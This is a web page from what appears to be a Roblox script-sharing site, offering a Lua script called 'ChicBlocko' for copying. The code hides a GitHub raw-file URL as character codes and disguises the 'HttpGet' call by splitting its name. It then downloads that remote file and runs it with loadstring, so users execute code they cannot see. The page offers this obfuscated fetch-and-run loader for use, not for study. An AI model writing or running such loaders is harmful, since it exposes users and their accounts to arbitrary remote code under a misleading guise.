www.roblox-scripter.com

Сontent continues after AD

Script – ChicBlocko

Thank you for using our website
Your script:

				
					local _p, _q, _r, _s, _t = {}, {}, {}, {}, {}

local z = {104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47,112,97,120,113,112,47,80,97,120,47,109,97,105,110,47,85,105,46,108,117,97}

for i, v in ipairs(z) do
  if i % 2 == 0 then
      table.insert(_p, v)
  else
      table.insert(_q, v)
  end
end

for _, v in ipairs(_p) do
  table.insert(_r, string.char(v))
end

for _, v in ipairs(_q) do
  table.insert(_s, string.char(v))
end

for i = 1, #_s do
  table.insert(_t, _s[i])
  if _r[i] then
      table.insert(_t, _r[i])
  end
end

local _f = "Htt" .. "pG" .. "et"
loadstring(game[_f](table.concat(_t)))()